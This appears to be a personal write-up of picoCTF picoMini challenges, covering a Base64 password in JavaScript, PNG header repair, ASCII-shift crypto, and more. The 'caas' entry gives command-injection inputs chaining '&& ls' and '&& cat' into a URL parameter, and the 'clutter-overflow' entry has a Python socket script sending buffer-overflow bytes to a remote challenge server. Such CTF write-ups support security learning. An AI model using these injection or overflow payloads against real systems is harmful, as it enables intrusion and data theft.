CTF Problems, July 5th 2021

[Easy] [Web] login

My dog-sitter’s brother made this website but I can’t get in; can you help?

login.mars.picoctf.net

In the developer tools, under the Network tab, find index.js; it contains the password as Base64-encoded ciphertext, and decoding it gives the flag.

[Easy] [Forensics] advanced-potion-making

Ron just found his own copy of advanced potion making, but its been corrupted by some kind of spell. Help him recover it!

https://artifacts.picoctf.net/picoMini+by+redpwn/Forensics/advanced-potion-making/advanced-potion-making

Downloaded a file: advanced-potion-making

Looking at the binary, it looks a lot like a PNG. So change the leading bytes to:

89 50 4E 47 0D 0A 1A 0A 00 00 00 0D

Then change the extension to .png and open it with stegsolve to get the flag.

P.S. Watch out for 'i' vs '1', 'j' vs 'd', and 'v' vs 'r'.

[Easy] [Reverse] vault-door-training

Your mission is to enter Dr. Evil’s laboratory and retrieve the blueprints for his Doomsday Project. The laboratory is protected by a series of locked vault doors. Each door is controlled by a computer and requires a password to open. Unfortunately, our undercover agents have not been able to obtain the secret passwords for the vault doors, but one of our junior agents obtained the source code for each vault’s computer! You will need to read the source code for each level to figure out what the password is for that vault door. As a warmup, we have created a replica vault in our training facility. The source code for the training vault is here: VaultDoorTraining.java

Hint: The password is revealed in the program’s source code.

Downloaded a .java file: VaultDoorTraining.java

Open it and the flag is right there.

[Easy] [Crypto] The Numbers

The numbers… what do they mean?

Hint: The flag is in the format PICOCTF{}

Downloaded an image: the_numbers.png

Opening it shows some numbers and a pair of curly braces; guessed a Caesar cipher straight away.

The flag starts with picoCTF, so subtract the ASCII codes to see what the difference is, then add that difference to each number and convert each one to a character via ASCII.

[Easy] [Web] caas

Now presenting cowsay as a service

https://artifacts.picoctf.net/picoMini+by+redpwn/Web+Exploitation/caas/index.js

Hint: Tomorrow I’m going to teach my cow to say Mooo...;moo!

Downloaded a .js file: index.js

The hint was not in the original picoCTF; it was a big help.

You can see that the page does not return a proper result.

Guessed that the challenge simply takes /usr/games/cowsay ${req.params.message}, substitutes the passed message for ${req.params.message}, and runs it directly.

Tried 123%20&&%20ls; it printed the files in the current directory, and among them was a falg.txt.

Then sent 123%20&&%20cat%20falg.txt to get the flag.

[Medium] [Web] notepad

This note-taking site seems a bit off.

notepad.mars.picoctf.net

https://artifacts.picoctf.net/picoMini+by+redpwn/Web+Exploitation/notepad/notepad.tar

Downloaded a .tar file: notepad.tar

// TODO

[Medium] [Binary] clutter-overflow

Clutter, clutter everywhere and not a byte to use.

nc mars.picoctf.net 31890

https://artifacts.picoctf.net/picoMini+by+redpwn/Binary+Exploitation/clutter-overflow/chall.c

https://artifacts.picoctf.net/picoMini+by+redpwn/Binary+Exploitation/clutter-overflow/chall

Downloaded two files: chall.c and chall

Looking at chall.c, you can see it is a buffer overflow vulnerability.

Run the code below and keep trying different values for the multiplier in b'\xef\xbe\xad\xde' * 0x43 until you hit the one that works.

import socket


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect(('mars.picoctf.net', 31890))
    # read the banner and the prompt
    data = s.recv(1024)
    data = s.recv(1024)

    # fill the buffer with 0xdeadbeef; adjust the 0x43 multiplier until it works
    s.sendall(b'\xef\xbe\xad\xde' * 0x43 + b'\n')

    data = s.recv(1024)
    print(data)
    data = s.recv(1024)
    print(data)
except Exception as e:
    print(e)
finally:
    s.close()